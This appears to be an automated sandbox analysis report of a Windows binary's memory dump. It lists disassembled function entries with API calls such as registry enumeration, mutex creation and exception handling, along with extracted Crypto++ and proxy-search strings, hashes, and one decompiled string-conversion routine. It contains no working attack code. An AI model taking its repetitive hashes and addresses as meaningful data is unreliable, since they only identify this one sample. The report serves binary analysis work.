                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CreateCriticalInitializeSectionThread
                                                                                                                        • String ID: WatitingThread.new ConnectionThread.Failed$eingehende IPC-Verbindung
                                                                                                                        • API String ID: 991770091-341428905
                                                                                                                        • Opcode ID: e9e2a0bde2239673c7c78f3e8bcf047704431c895a13c5442fad62983a1c466a
                                                                                                                        • Instruction ID: 95a725770c04ea122dbc4d0f34c902012e069460ecc3f0c55dc72dfd3e64f628
                                                                                                                        • Opcode Fuzzy Hash: e9e2a0bde2239673c7c78f3e8bcf047704431c895a13c5442fad62983a1c466a
                                                                                                                        • Instruction Fuzzy Hash: B921AEB0900249EBEB04EBE5C88BAEEBF74AF55318F10424EF251572C2D7B45E44C7A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D9A64
                                                                                                                          • Part of subcall function 004D91DF: __EH_prolog3.LIBCMT ref: 004D9201
                                                                                                                          • Part of subcall function 004D91DF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004D9306
                                                                                                                          • Part of subcall function 004D91DF: RegEnumKeyExW.ADVAPI32(?,00000000,80000001,?,00000000,00000000,00000000,?), ref: 004D933F
                                                                                                                          • Part of subcall function 004D91DF: RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000001,00000000), ref: 004D93F5
                                                                                                                          • Part of subcall function 004D843A: __EH_prolog3.LIBCMT ref: 004D8441
                                                                                                                          • Part of subcall function 004D843A: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020006,?,?,?,?,?,?,00000004,004D9BA1,0084C304), ref: 004D8467
                                                                                                                          • Part of subcall function 004D843A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000004,004D9BA1,0084C304), ref: 004D8474
                                                                                                                          • Part of subcall function 004D91DF: RegEnumValueW.ADVAPI32(?,00000000,80000001,00000100,00000000,?,00000000,?), ref: 004D96CD
                                                                                                                          • Part of subcall function 004D91DF: RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000001,00000000,00000000), ref: 004D99EA
                                                                                                                          • Part of subcall function 004D91DF: RegCloseKey.ADVAPI32(80000002), ref: 004D9A05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumH_prolog3$Open$Value
                                                                                                                        • String ID: Machine:$User:
                                                                                                                        • API String ID: 1442275762-3964720792
                                                                                                                        • Opcode ID: 3d53818ae46bfb57098b81b26dcc3d26c91aa927d84ecbebe061918792f3a5bf
                                                                                                                        • Instruction ID: d51dc8bd3b0e1553d8746914cd8aad9d185616760c972f5bcd4c4530a76a30b2
                                                                                                                        • Opcode Fuzzy Hash: 3d53818ae46bfb57098b81b26dcc3d26c91aa927d84ecbebe061918792f3a5bf
                                                                                                                        • Instruction Fuzzy Hash: CB219170D11249ABDB14FF79C55B2AD7F71AF41324F20426EE5102B3D2CA390F09979A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E00CC
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteInitialize
                                                                                                                        • String ID: UNCHANGED$VerifyIP
                                                                                                                        • API String ID: 4214761318-2930671668
                                                                                                                        • Opcode ID: 91eef4a2171dda14f14aa97f33a6647f1de379d807220f6d47e0486ea178ed87
                                                                                                                        • Instruction ID: cdd2f9ab1fcc20d1d968178ed03b8e7fc89dd10e219b05648128e262eb6260d3
                                                                                                                        • Opcode Fuzzy Hash: 91eef4a2171dda14f14aa97f33a6647f1de379d807220f6d47e0486ea178ed87
                                                                                                                        • Instruction Fuzzy Hash: 9C21C471800288EEDB05EBA4C892BDD7B74AF21304F1484AEE44667292EF746F49CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004924C0
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00492504
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • Integer: Min must be no greater than Max, xrefs: 004924D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                                                        • String ID: Integer: Min must be no greater than Max
                                                                                                                        • API String ID: 1412866469-615354371
                                                                                                                        • Opcode ID: a927585a2eb05c94274044061798f93cf7d22b42e7853b4a6d763328dca123f7
                                                                                                                        • Instruction ID: c8a48653ccca1a8f3c14392122cb830fe1290718b987010d167ecb8d9443d1bc
                                                                                                                        • Opcode Fuzzy Hash: a927585a2eb05c94274044061798f93cf7d22b42e7853b4a6d763328dca123f7
                                                                                                                        • Instruction Fuzzy Hash: 9F110D3190020AAADF05FF91CC56EDEBF75BF04304F10402AF918A71A1DB799A15DB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050328F
                                                                                                                        • _malloc.LIBCMT ref: 0050329B
                                                                                                                          • Part of subcall function 00537172: __FF_MSGBANNER.LIBCMT ref: 00537195
                                                                                                                          • Part of subcall function 00537172: RtlAllocateHeap.NTDLL(00000000,005343C7,00000000,00000002,00000000,?,005343D6,?), ref: 005371EA
                                                                                                                          • Part of subcall function 00503185: __EH_prolog3.LIBCMT ref: 0050318C
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        • ProxySearch.setUserBaseDir: getAppDataPathImpersonate failed, xrefs: 005032ED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$AllocateDeleteEnterHeapInitializeLeave_malloc
                                                                                                                        • String ID: ProxySearch.setUserBaseDir: getAppDataPathImpersonate failed
                                                                                                                        • API String ID: 2960791462-1931582195
                                                                                                                        • Opcode ID: e3bf6049251acef1625ed508114717d66b815a9550251d7521e1f24097b6a237
                                                                                                                        • Instruction ID: 430bb1baf6292b4e874a3d2895d1707d366e238aeab348e772ec6d431cb33c26
                                                                                                                        • Opcode Fuzzy Hash: e3bf6049251acef1625ed508114717d66b815a9550251d7521e1f24097b6a237
                                                                                                                        • Instruction Fuzzy Hash: 8601C07180120AAAEB14FFE4C8569EDBF79AF95310F20016EB012A71D2DB745B45C76A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00494406
                                                                                                                          • Part of subcall function 0047F8AC: __EH_prolog3.LIBCMT ref: 0047F8B3
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0049447F
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • MontgomeryRepresentation: Montgomery representation requires an odd modulus, xrefs: 00494450
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrow
                                                                                                                        • String ID: MontgomeryRepresentation: Montgomery representation requires an odd modulus
                                                                                                                        • API String ID: 1412866469-124676765
                                                                                                                        • Opcode ID: 4c4410a684e301eed79b65552161e3fe95e87a1816b91054b8c755a928fb9bfe
                                                                                                                        • Instruction ID: a3c743a33cdbe00fafea3e9a56f4300eb4c700835b9eccd05e2b5838c060713b
                                                                                                                        • Opcode Fuzzy Hash: 4c4410a684e301eed79b65552161e3fe95e87a1816b91054b8c755a928fb9bfe
                                                                                                                        • Instruction Fuzzy Hash: 5A11A371800105AADF05EF94C982BCDBF75AF18304F4540A9F905AB197D779DA09C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00504B47
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00504B54
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8H_prolog3Throw_malloc
                                                                                                                        • String ID: b>F
                                                                                                                        • API String ID: 1631339918-1785215364
                                                                                                                        • Opcode ID: d463214447618252c6b627d89a1ca0a8b5e2d8c26fc86f8b42305492a84e0373
                                                                                                                        • Instruction ID: f6d54aae56baef6531c4be1c54bf0439bd89ec727806600029007dd471f88795
                                                                                                                        • Opcode Fuzzy Hash: d463214447618252c6b627d89a1ca0a8b5e2d8c26fc86f8b42305492a84e0373
                                                                                                                        • Instruction Fuzzy Hash: BB01A2B0A102049EEB0CEF649816B5E7BB5BB40320F10867DEA26DB2D2CB74D504CB84
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B2235
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004B226E
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        • invalid vector<T> subscript, xrefs: 004B2248
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: invalid vector<T> subscript
                                                                                                                        • API String ID: 1961742612-3016609489
                                                                                                                        • Opcode ID: fab44ce1d1dae61ae089aeca1cea21c363a1796d4b13aecc36bf47c4e90bc980
                                                                                                                        • Instruction ID: a6e5e539db04b224d44c49cbd76516cb9cb0caadd6a0c81cdcc836fb6d3d2af9
                                                                                                                        • Opcode Fuzzy Hash: fab44ce1d1dae61ae089aeca1cea21c363a1796d4b13aecc36bf47c4e90bc980
                                                                                                                        • Instruction Fuzzy Hash: D9018C7190060A9BCB14FF90C986ACDBBF6BF40300F10841AF116A7241CBB8BA41CBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA6F1
                                                                                                                        • CloseHandle.KERNEL32(?,?,0000000C,004EA7E2), ref: 004EA716
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseH_prolog3Handle
                                                                                                                        • String ID: Thread.Close.Failed
                                                                                                                        • API String ID: 2454561918-2459011140
                                                                                                                        • Opcode ID: b33911be254bb2e3bf2c396da985e07375198c05fcfac92389e534ea5e76bb51
                                                                                                                        • Instruction ID: a60f36d33c7de2fcffc1cd738488eec57fb9def399ca80a454986dbeea55d5d8
                                                                                                                        • Opcode Fuzzy Hash: b33911be254bb2e3bf2c396da985e07375198c05fcfac92389e534ea5e76bb51
                                                                                                                        • Instruction Fuzzy Hash: 54012BB1901385AEDB20EFB1859589FBF74AF50301F00416EE19293281DB38BE04C796
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?), ref: 005271F8
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00527210
                                                                                                                        Strings
                                                                                                                        • {C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag, xrefs: 005271D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateCurrentMutexProcess
                                                                                                                        • String ID: {C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
                                                                                                                        • API String ID: 3937467467-1122789031
                                                                                                                        • Opcode ID: 774dd8ff3b625c433a32e54056a99a8b65f028f3e289f01f639f49bee0b4a731
                                                                                                                        • Instruction ID: 81e959a291fd83f201deccb960cb41be94144c0baa0daf6cda866095d3dd0a15
                                                                                                                        • Opcode Fuzzy Hash: 774dd8ff3b625c433a32e54056a99a8b65f028f3e289f01f639f49bee0b4a731
                                                                                                                        • Instruction Fuzzy Hash: A4F06271508205AFD600EB14EC46FAFBBE9BFC9301F448829F54586240EA7595088B92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00480019
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                          • Part of subcall function 0040D733: char_traits.LIBCPMT ref: 0040D758
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00480064
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrowchar_traits
                                                                                                                        • String ID: BER decode error
                                                                                                                        • API String ID: 266644545-1805846189
                                                                                                                        • Opcode ID: bbea0f6ce74b2468e2bc1d46a3b32400e4fb590f6db53a012fd4c4c659c8fee4
                                                                                                                        • Instruction ID: 117fa4b87d6d487ca973219417f4cde726356f78ea7b64f01c4163cc4afe80e0
                                                                                                                        • Opcode Fuzzy Hash: bbea0f6ce74b2468e2bc1d46a3b32400e4fb590f6db53a012fd4c4c659c8fee4
                                                                                                                        • Instruction Fuzzy Hash: C1F06D71900209AEDB10EFE1D906BCDBB74AF14320F508829F201BA1C5CBB84E4CCB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050720F
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0050724B
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: list<T> too long
                                                                                                                        • API String ID: 1961742612-4027344264
                                                                                                                        • Opcode ID: b0fe6d939dd9a7f8fc27e2432f166d1bdcb5f49772b2785f8bbf6fb886bd56db
                                                                                                                        • Instruction ID: b197ba20cea94d8c8ca3b5b5c2b4d34bc31b48fd2fbf23ace0110750c0b93404
                                                                                                                        • Opcode Fuzzy Hash: b0fe6d939dd9a7f8fc27e2432f166d1bdcb5f49772b2785f8bbf6fb886bd56db
                                                                                                                        • Instruction Fuzzy Hash: 22F08CB6D00119ABCB10EBE0C846ADCBB746F58314F148429E209BB282EB74A945CA94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FD6E9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004FD725
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: list<T> too long
                                                                                                                        • API String ID: 1961742612-4027344264
                                                                                                                        • Opcode ID: 1621299cd655ee5801c33b682aea89a6c2a9f9a70f93daf0a0b131e806f6b8d7
                                                                                                                        • Instruction ID: c898be6f5a3a520538782ba05abb5e948d7319bfe79206e0982e596be52310d6
                                                                                                                        • Opcode Fuzzy Hash: 1621299cd655ee5801c33b682aea89a6c2a9f9a70f93daf0a0b131e806f6b8d7
                                                                                                                        • Instruction Fuzzy Hash: C2F0A0B2D0021D9BCB10EFE4C846BDDB7B4BF58314F14842AE209EB281EB789D45CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00502BCD
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00502C09
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: list<T> too long
                                                                                                                        • API String ID: 1961742612-4027344264
                                                                                                                        • Opcode ID: e684f9e7d1a5cee51ab4980093be47e78791cb173aa973dbce2f9b875f1920c1
                                                                                                                        • Instruction ID: c0aefa15151adcbc0f20e847e684443ce2c4372908de7d31b851bcbdf7ecaf6c
                                                                                                                        • Opcode Fuzzy Hash: e684f9e7d1a5cee51ab4980093be47e78791cb173aa973dbce2f9b875f1920c1
                                                                                                                        • Instruction Fuzzy Hash: 9EF0A0B2D0021D9BDB10EBE4C846ADCBB747F58324F148629E609FB2C2EB749D45CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: !@$)@
                                                                                                                        • API String ID: 431132790-1125940535
                                                                                                                        • Opcode ID: e184ce1c77edb735d31df7bc863df0eec667f4472034b46a30e037005a97abb0
                                                                                                                        • Instruction ID: 107344c2982bdeb8ed19b804b2c2f73b906c45770a1544aeb056ef7413af8c2a
                                                                                                                        • Opcode Fuzzy Hash: e184ce1c77edb735d31df7bc863df0eec667f4472034b46a30e037005a97abb0
                                                                                                                        • Instruction Fuzzy Hash: 5DE048B26506169BC7109F68CC8179DBBA56B88314F050D3DF205EB281D77C99558794
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A360(char* _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                        				intOrPtr* _t12;
                                                                                                                        				short* _t13;
                                                                                                                        				int _t14;
                                                                                                                        				int _t18;
                                                                                                                        				char* _t19;
                                                                                                                        
                                                                                                                        				_t19 = _a4;
                                                                                                                        				_t13 = 0;
                                                                                                                        				asm("sbb esi, esi");
                                                                                                                        				_t18 =  ~_a8 & 0x0000fde9;
                                                                                                                        				_t14 = MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, 0, 0);
                                                                                                                        				if(_t14 > 0) {
                                                                                                                        					_t4 = _t14 + 2; // 0x2
                                                                                                                        					_t13 = HeapAlloc(GetProcessHeap(), 8, _t14 + _t4);
                                                                                                                        					MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, _t13, _t14);
                                                                                                                        					_t12 = _a12;
                                                                                                                        					if(_t12 != 0) {
                                                                                                                        						 *_t12 = _t14 - 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t13;
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,6F3375D5,?,00000001,00000000), ref: 6F33A37F
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction ID: 4af41991ab75589ae8fc3341def39c1de76c2ef6b34f59a69a079a8b4dbe007d
                                                                                                                        • Opcode Fuzzy Hash: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction Fuzzy Hash: 2EF09677600A2D7FEB108AA98C84E67B7EDEB86775F100229FA24D32C0D770EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%